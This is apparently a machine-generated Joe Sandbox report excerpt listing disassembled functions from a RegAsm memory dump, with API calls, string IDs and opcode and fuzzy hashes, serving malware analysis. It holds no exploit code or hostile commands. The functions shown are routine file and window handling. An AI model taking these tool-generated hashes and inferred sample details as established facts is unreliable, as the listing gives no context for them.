                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                      Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                      Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$CloseHandle
                                                                                                                                                                                                                      • String ID: General
                                                                                                                                                                                                                      • API String ID: 3722638380-26480598
                                                                                                                                                                                                                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                      Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 764393265-0
                                                                                                                                                                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                      Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 979780441-0
                                                                                                                                                                                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                      Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1386444988-0
                                                                                                                                                                                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                                      Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                      • String ID: d=E
                                                                                                                                                                                                                      • API String ID: 909852535-3703654223
                                                                                                                                                                                                                      • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                                      Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                      • String ID: "
                                                                                                                                                                                                                      • API String ID: 1983396471-123907689
                                                                                                                                                                                                                      • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                                      Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                      • String ID: URL
                                                                                                                                                                                                                      • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                      Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                      • API String ID: 2789212964-323797159
                                                                                                                                                                                                                      • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                      Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintf
                                                                                                                                                                                                                      • String ID: %%-%d.%ds
                                                                                                                                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                      • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                      Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                                                                                      • String ID: F^@
                                                                                                                                                                                                                      • API String ID: 568519121-3652327722
                                                                                                                                                                                                                      • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                      Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PlacementWindowmemset
                                                                                                                                                                                                                      • String ID: WinPos
                                                                                                                                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                      • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                      Function 00414E13 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                      • API String ID: 4271163124-1506664499
                                                                                                                                                                                                                      • Opcode ID: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                      Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@DeleteObject
                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                      • API String ID: 1103273653-628097481
                                                                                                                                                                                                                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                      Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                      • API String ID: 383090722-1948609170
                                                                                                                                                                                                                      • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                      Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                      • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                      Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                      • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                                                                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                      Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040A92B
